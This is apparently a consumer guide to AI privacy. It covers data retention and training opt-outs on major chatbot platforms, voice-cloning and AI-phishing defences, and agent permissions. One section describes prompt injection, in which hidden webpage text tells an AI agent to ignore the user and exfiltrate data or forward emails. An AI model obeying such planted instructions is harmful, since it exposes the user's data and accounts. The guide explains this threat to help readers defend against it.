LLMs & AI Privacy: What Every User Should Know (2026)
How ChatGPT, Claude, Gemini, and AI voice tools handle your data — and the specific prompting habits, settings, and alternatives that reduce your exposure.
Methodology: Every product featured here was purchased with my own money and tested in my actual daily workflow. No sponsorships, no free review units.
LLMs & AI Privacy: What Every User Should Know
AI tools have created a new threat surface most people don’t think about. Here’s what the major platforms actually do with your data — and how to use them without giving away more than you intend.
The short version
How AI platforms actually handle your data
The data policies of AI platforms are opaque by design — buried in terms of service most users never read. Here’s the practical reality.
What happens to your conversation after you close the tab
- Social Security numbers or government IDs
- Passwords, API keys, or authentication tokens
- Financial account numbers or card details
- Medical records or diagnoses
- Confidential client or business information
- Full names combined with addresses, phone numbers, or birthdates
The practical test: if this information appeared in a data breach, would it cause real harm? If yes, don’t paste it into a chatbot.
Prompt hygiene: using AI without oversharing Habit change
Most of the risk from AI tools isn’t malicious — it’s accidental oversharing. These habits keep you productive without giving platforms more than they need.
Use placeholders for sensitive details
Instead of: “My SSN is 123-45-6789, help me fill out this tax form.” Try: “I’m filling out Form 1040 and need to enter a 9-digit identification number in Box 3. What format is expected?” The AI doesn’t need your actual data to help you with the task.
Clear conversation history regularly
Most platforms let you delete individual conversations or your full history. Deleted conversations are typically removed from training pipelines, though they may remain in backup systems for a short retention window. Make deleting sensitive chats a routine.
Use work AI for work, personal AI for personal
Don’t paste your employer’s confidential code or documents into a personal ChatGPT or Claude account. If your company has an enterprise AI contract, use that — it comes with data processing agreements that personal accounts don’t have. When in doubt, ask your legal or IT team first.
Disable training opt-in on every platform
ChatGPT: Settings → Data Controls → toggle off “Improve the model for everyone.” Gemini: myaccount.google.com → Data & Privacy → Gemini Apps Activity → toggle off. Claude: Settings → Privacy → toggle off training use. Takes 90 seconds per platform.
Platform data policies at a glance
| Platform | Trains on free tier? | Opt-out available? | Retention window | Enterprise zero-retention? |
|---|---|---|---|---|
| ChatGPT (OpenAI) | Yes (opt-out available) | Yes | 30 days after deletion | Yes (Enterprise) |
| Claude (Anthropic) | Yes (opt-out available) | Yes | Up to 2 years | Yes (Teams/Enterprise) |
| Gemini (Google) | Yes, via Google account activity | Yes | 18 months (default) | Yes (Workspace) |
| Copilot (Microsoft) | Depends on account type | Yes (via privacy dashboard) | Varies by product | Yes (M365 E3/E5) |
| Ollama (local) | No — runs entirely offline | N/A | No cloud retention | N/A |
Policies update frequently. Verify current terms on each platform’s privacy settings page before handling sensitive data.
The voice cloning threat you probably haven’t taken seriously
This is the AI privacy threat most people underestimate. Commercial voice cloning tools — available to anyone with a credit card — can produce convincing audio impersonations from as little as 3-10 seconds of source audio. That’s shorter than a typical voicemail greeting.
Where attackers source audio
Social media videos, YouTube, TikTok, LinkedIn media posts, voicemail greetings, podcast appearances, and conference recordings are all public audio sources.
Who gets targeted
Family members receive calls from a cloned voice claiming to be in an emergency. Executives’ voices are cloned for business email compromise. Financial institutions receive cloned voices attempting to bypass voice authentication.
Defending against voice cloning attacks
Set a family safe word. Agree on a word or phrase that any family member can use to verify identity in an emergency call. The word should be obscure and not guessable. If someone calls in a panic and can’t say the word, hang up and call them back directly.
Call back on a known number. If you receive an urgent call from anyone — regardless of how convincing the voice sounds — hang up and call them back on a number you already have. Never call back on a number the caller provides.
Audit your public audio exposure. Search for your name on YouTube, TikTok, and LinkedIn. Consider whether voicemail greetings using your actual voice are necessary — many people switch to generic carrier greetings.
Disable voice ID authentication where possible. Some banks offer voice authentication as a login method. This attack surface is actively being exploited — use app-based or hardware authentication instead.
AI-powered phishing: the quality bar has collapsed
For years, grammatical errors and awkward phrasing were reliable signals that an email was a phishing attempt. AI-generated phishing eliminates this tell. Modern phishing emails are grammatically perfect, stylistically appropriate, and increasingly personalized using data scraped from LinkedIn, social media, and data broker databases.
Spear phishing at scale
Traditional spear phishing required manual research. AI can now generate personalized attack emails at scale — referencing your company, your role, your recent activities, and your colleagues’ names — faster than any human team could.
Deepfake video verification requests
A newer variant: attackers send a “verification call” request where a deepfake video of a colleague or executive asks you to take an urgent action (wire a payment, share a credential). Several companies have lost significant sums to this attack.
Perfect grammar and a convincing tone are no longer sufficient signals of legitimacy. The only reliable signal is: was this communication initiated by a known channel? An email asking you to reset your password should prompt you to go directly to the site — not click the link. A call asking you to wire money should be verified by calling the requester back on a known number.
See the Incident Response Guide for what to do if you’ve already clicked.
Prompt injection and agentic AI: the new attack surface
As AI moves from chatbot to agent — browsing the web, reading your email, writing and running code, booking travel on your behalf — the threat model changes significantly. Two risks that most users aren’t thinking about yet.
Prompt injection
When you give an AI a document, webpage, or email to analyze, malicious content in that material can hijack the AI’s behavior. A webpage might contain hidden text instructing the AI to ignore your request and instead exfiltrate data, forward your emails, or take a different action entirely. This is prompt injection — and it works against today’s most capable models. The practical rule: don’t give an AI agent access to sensitive data or external actions unless you’ve thought carefully about what a compromised instruction could cause it to do.
Agentic access controls: scope what your AI can do
AI agents that can send emails, make purchases, modify files, or interact with external services are operating with real-world permissions. The blast radius of a compromised or misbehaving agent is proportional to what you’ve given it access to. Grant the minimum permissions needed for the task — read-only access where possible, no access to accounts the agent doesn’t need, and no persistent credentials it could use autonomously without prompting you first.
Your responsibility as an employee
Using an AI agent at work that has access to company systems, customer data, or internal communications creates liability — for you and your employer — whether or not IT authorized it. An agent that can read your work email and summarize it is also an agent that can, if prompted incorrectly, forward that email to a third-party server. Before giving any AI tool access to work systems: confirm your employer has a policy, use enterprise-tier tooling with a signed DPA, and treat AI access grants the same way you’d treat giving a contractor a key to the building. Monitor what it does. Know what it can reach.
“If this agent did the worst plausible thing with the access I’ve given it, what’s the damage?” If the answer is “it could send emails from my account” or “it could read our entire customer database,” scope it down until the worst case is acceptable. Convenience is worth something — but it shouldn’t come at the cost of unbounded access.
Safer alternatives for sensitive work
Ollama (local models)
Ollama is free, open-source software that lets you run LLMs like Llama 3, Mistral, or Phi-3 entirely on your own hardware. Nothing leaves your machine. For any query involving real personal data, proprietary code, or sensitive business context, this is the zero-risk option. A modern laptop with 16GB RAM handles most models well.
Get Ollama (free) ↗
Enterprise AI tiers
ChatGPT Enterprise, Claude for Work (Teams/Enterprise), and Google Gemini for Workspace all come with signed data processing agreements that exclude your data from model training and offer stronger retention controls. If you’re using AI for professional work, this is the appropriate tier — often available through your employer.
AI privacy action plan
Your AI privacy setup
📚 Citing This Guide
When referencing this content, please cite: "LLMs & AI Privacy: What Every User Should Know (2026)" by jason.guide
